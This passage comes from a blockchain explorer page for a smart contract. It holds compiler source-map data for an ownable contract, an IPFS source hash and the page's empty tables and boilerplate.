-1;;;;;5873:6:0;4897:10;5873:22;5865:67;;;;-1:-1:-1;;;5865:67:0;;;;;;;:::i;:::-;10077:51:::1;::::0;10085:10:::1;::::0;10106:21:::1;10077:51:::0;::::1;;;::::0;::::1;::::0;;;10106:21;10085:10;10077:51;::::1;;;;;;;;;;;;;::::0;::::1;;;;;;10026:110::o:0;6606:244::-;5873:6;;-1:-1:-1;;;;;5873:6:0;4897:10;5873:22;5865:67;;;;-1:-1:-1;;;5865:67:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;6695:22:0;::::1;6687:73;;;::::0;-1:-1:-1;;;6687:73:0;;7247:2:1;6687:73:0::1;::::0;::::1;7229:21:1::0;7286:2;7266:18;;;7259:30;7325:34;7305:18;;;7298:62;-1:-1:-1;;;7376:18:1;;;7369:36;7422:19;;6687:73:0::1;7045:402:1::0;6687:73:0::1;6797:6;::::0;;6776:38:::1;::::0;-1:-1:-1;;;;;6776:38:0;;::::1;::::0;6797:6;::::1;::::0;6776:38:::1;::::0;::::1;6825:6;:17:::0;;-1:-1:-1;;;;;;6825:17:0::1;-1:-1:-1::0;;;;;6825:17:0;;;::::1;::::0;;;::::1;::::0;;6606:244::o;14:127:1:-;75:10;70:3;66:20;63:1;56:31;106:4;103:1;96:15;130:4;127:1;120:15;146:131;-1:-1:-1;;;;;221:31:1;;211:42;;201:70;;267:1;264;257:12;282:134;350:20;;379:31;350:20;379:31;:::i;:::-;282:134;;;:::o;421:1121::-;505:6;536:2;579;567:9;558:7;554:23;550:32;547:52;;;595:1;592;585:12;547:52;635:9;622:23;664:18;705:2;697:6;694:14;691:34;;;721:1;718;711:12;691:34;759:6;748:9;744:22;734:32;;804:7;797:4;793:2;789:13;785:27;775:55;;826:1;823;816:12;775:55;862:2;849:16;884:2;880;877:10;874:36;;;890:18;;:::i;:::-;936:2;933:1;929:10;968:2;962:9;1031:2;1027:7;1022:2;1018;1014:11;1010:25;1002:6;998:38;1086:6;1074:10;1071:22;1066:2;1054:10;1051:18;1048:46;1045:72;;;1097:18;;:::i;:::-;1133:2;1126:22;1183:18;;;1217:15;;;;-1:-1:-1;1259:11:1;;;1255:20;;;1287:19;;;1284:39;;;1319:1;1316;1309:12;1284:39;1343:11;;;;1363:148;1379:6;1374:3;1371:15;1363:148;;;1445:23;1464:3;1445:23;:::i;:::-;1433:36;;1396:12;;;;1489;;;;1363:148;;;1530:6;421:1121;-1:-1:-1;;;;;;;;421:1121:1:o;1547:118::-;1633:5;1626:13;1619:21;1612:5;1609:32;1599:60;;1655:1;1652;1645:12;1670:241;1726:6;1779:2;1767:9;1758:7;1754:23;1750:32;1747:52;;;1795:1;1792;1785:12;1747:52;1834:9;1821:23;1853:28;1875:5;1853:28;:::i;:::-;1900:5;1670:241;-1:-1:-1;;;1670:241:1:o;2124:180::-;2183:6;2236:2;2224:9;2215:7;2211:23;2207:32;2204:52;;;2252:1;2249;2242:12;2204:52;-1:-1:-1;2275:23:1;;2124:180;-1:-1:-1;2124:180:1:o;2309:388::-;2377:6;2385;2438:2;2426:9;2417:7;2413:23;2409:32;2406:52;;;2454:1;2451;2444:12;2406:52;2493:9;2480:23;2512:31;2537:5;2512:31;:::i;:::-;2562:5;-1:-1:-1;2619:2:1;2604:18;;2591:32;2632:33;2591:32;2632:33;:::i;:::-;2684:7;2674:17;;;2309:388;;;;;:::o;2884:247::-;2943:6;2996:2;2984:9;2975:7;2971:23;2967:32;2964:52;;;3012:1;3009;3002:12;2964:52;3051:9;3038:23;3070:31;3095:5;3070:31;:::i;3136:356::-;3338:2;3320:21;;;3357:18;;;3350:30;3416:34;3411:2;3396:18;;3389:62;3483:2;3468:18;;3136:356::o;3497:127::-;3558:10;3553:3;3549:20;3546:1;3539:31;3589:4;3586:1;3579:15;3613:4;3610:1;3603:15;3629:127;3690:10;3685:3;3681:20;3678:1;3671:31;3721:4;3718:1;3711:15;3745:4;3742:1;3735:15;3761:135;3800:3;3821:17;;;3818:43;;3841:18;;:::i;:::-;-1:-1:-1;3888:1:1;3877:13;;3761:135::o;3901:251::-;3971:6;4024:2;4012:9;4003:7;3999:23;3995:32;3992:52;;;4040:1;4037;4030:12;3992:52;4072:9;4066:16;4091:31;4116:5;4091:31;:::i;4436:245::-;4503:6;4556:2;4544:9;4535:7;4531:23;4527:32;4524:52;;;4572:1;4569;4562:12;4524:52;4604:9;4598:16;4623:28;4645:5;4623:28;:::i;4686:422::-;4775:1;4818:5;4775:1;4832:270;4853:7;4843:8;4840:21;4832:270;;;4912:4;4908:1;4904:6;4900:17;4894:4;4891:27;4888:53;;;4921:18;;:::i;:::-;4971:7;4961:8;4957:22;4954:55;;;4991:16;;;;4954:55;5070:22;;;;5030:15;;;;4832:270;;;4836:3;4686:422;;;;;:::o;5113:806::-;5162:5;5192:8;5182:80;;-1:-1:-1;5233:1:1;5247:5;;5182:80;5281:4;5271:76;;-1:-1:-1;5318:1:1;5332:5;;5271:76;5363:4;5381:1;5376:59;;;;5449:1;5444:130;;;;5356:218;;5376:59;5406:1;5397:10;;5420:5;;;5444:130;5481:3;5471:8;5468:17;5465:43;;;5488:18;;:::i;:::-;-1:-1:-1;;5544:1:1;5530:16;;5559:5;;5356:218;;5658:2;5648:8;5645:16;5639:3;5633:4;5630:13;5626:36;5620:2;5610:8;5607:16;5602:2;5596:4;5593:12;5589:35;5586:77;5583:159;;;-1:-1:-1;5695:19:1;;;5727:5;;5583:159;5774:34;5799:8;5793:4;5774:34;:::i;:::-;5844:6;5840:1;5836:6;5832:19;5823:7;5820:32;5817:58;;;5855:18;;:::i;:::-;5893:20;;5113:806;-1:-1:-1;;;5113:806:1:o;5924:131::-;5984:5;6013:36;6040:8;6034:4;6013:36;:::i;6060:980::-;6322:4;6370:3;6359:9;6355:19;6401:6;6390:9;6383:25;6427:2;6465:6;6460:2;6449:9;6445:18;6438:34;6508:3;6503:2;6492:9;6488:18;6481:31;6532:6;6567;6561:13;6598:6;6590;6583:22;6636:3;6625:9;6621:19;6614:26;;6675:2;6667:6;6663:15;6649:29;;6696:1;6706:195;6720:6;6717:1;6714:13;6706:195;;;6785:13;;-1:-1:-1;;;;;6781:39:1;6769:52;;6876:15;;;;6841:12;;;;6817:1;6735:9;6706:195;;;-1:-1:-1;;;;;;;6957:32:1;;;;6952:2;6937:18;;6930:60;-1:-1:-1;;;7021:3:1;7006:19;6999:35;6918:3;6060:980;-1:-1:-1;;;6060:980:1:o

Swarm Source

ipfs://b649e101c26772aaaa7b26c10a447d54818678a949c121046f0325b3ae2da95e

Block Transaction Difficulty Gas Used Reward
View All Blocks Produced

Block Uncle Number Difficulty Gas Used Reward
View All Uncles
Loading...
Loading
Loading...
Loading

Validator Index Block Amount
View All Withdrawals

Transaction Hash Block Value Eth2 PubKey Valid
View All Deposits
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A contract address hosts a smart contract, which is a set of code stored on the blockchain that runs when predetermined conditions are met. Learn more about addresses in our Knowledge Base.